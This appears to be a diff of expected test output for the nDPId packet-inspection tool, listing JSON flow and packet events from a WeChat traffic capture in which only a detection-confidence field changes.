00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1492167851002,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1492167851002,"pkt":"\/\/\/\/\/\/\/\/uHgu4toHCABFAAFI3+EAAP8R2sMAAAAA\/\/\/\/\/wBEAEMBNOAUAQEGADPq6ioAAAAAAAAAAAAAAAAAAAAAAAAAALh4LuLaBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDNwcBeQMGD3f8OQIF3D0HAbh4LuLaBzIEwKgBajMEAHanAAwOaVBob25lZGlNb25pY2H\/AAAAAAAA"} -00729{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1418,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167851002,"flow_last_seen":1492167851002,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1492167851002,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"iphonedimonica","fingerprint":"1,121,3,6,15,119,252","class_ident":""}} 
+00729{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1418,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167851002,"flow_last_seen":1492167851002,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1492167851002,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"iphonedimonica","fingerprint":"1,121,3,6,15,119,252","class_ident":""}} 00545{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1419,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492167851203,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1419,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1492167851203,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1492167851203,"pkt":"MzP\/hmxbuHgu4toHht1gAAAAACA6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/hmxbhwDa5wAAAAD+gAAAAAAAAAhCo\/OihmxbDgE+iVJ12j4="} 
-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1419,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492167851203,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1419,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492167851203,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1492167851204,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":62,"pkt_l4_len":8,"thread_ts_msec":1492167851204,"pkt":"MzMAAAACuHgu4toHht1gCL93AAg6\/\/6AAAAAAAAACEKj86KGbFv\/AgAAAAAAAAAAAAAAAAAChQDCHwAAAAA="} 
00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1421,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492167852023,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1421,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1492167852023,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":110,"pkt_l4_len":48,"thread_ts_msec":1492167852023,"pkt":"MzMAAAAWuHgu4toHht1gAAAAADgAAf6AAAAAAAAACEKj86KGbFv\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPAPHlAAAAAgQAAAD\/AgAAAAAAAAAAAAL\/tFRbBAAAAP8CAAAAAAAAAAAAAf+GbFs="} -00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492167852023,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
-00810{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1422,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167669545,"flow_last_seen":1492167848542,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1492167852023,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492167852023,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
+00810{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1422,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167669545,"flow_last_seen":1492167848542,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1492167852023,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1426,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167865975,"flow_last_seen":1492167865975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167865975,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1492167865975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167865975,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cVZAAEAGp93AqAFny82Tq+K4AbvAQN+1AAAAAKACchCA5wAAAgQFtAQCCAoAMq7jAAAAAAEDAwc="} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1427,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167866226,"flow_last_seen":1492167866226,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167866226,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1492167866226,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167866226,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8hOdAAEAGlEzAqAFny82Tq+K5AbuucSvFAAAAAKACchBGZwAAAgQFtAQCCAoAMq8iAAAAAAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1492167866243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167866243,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rhfZ1wawEDftqASN8iGUwAAAgQFoAQCCApFrzOuADKu4wEDAwc="} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1429,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1492167866243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167866243,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cVdAAEAGp+TAqAFny82Tq+K4AbvAQN+2X2dcG4AQAOXrqwAAAQEICgAyryZFrzOu"} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1430,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167865975,"flow_last_seen":1492167866243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167866243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1430,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167865975,"flow_last_seen":1492167866243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167866243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1431,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1492167866495,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167866495,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rl6NAw+rnErxqASN8iAowAAAgQFoAQCCApFrzPtADKvIgEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1432,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1492167866495,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167866495,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0hOhAAEAGlFPAqAFny82Tq+K5AbuucSvGejQMP4AQAOXl+wAAAQEICgAyr2VFrzPt"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1434,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1436,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
-00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1478,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167866226,"flow_last_seen":1492167871050,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492167871050,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1484,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01436{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1486,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
-00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1492167720101,"flow_last_seen":1492167748133,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":27649,"flow_avg_l4_payload_len":552,"midstream":0,"thread_ts_msec":1492167872304,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167720353,"flow_last_seen":1492167748129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492167872304,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167765433,"flow_last_seen":1492167776953,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9786,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":1492167897092,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1434,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1436,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1478,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167866226,"flow_last_seen":1492167871050,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492167871050,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
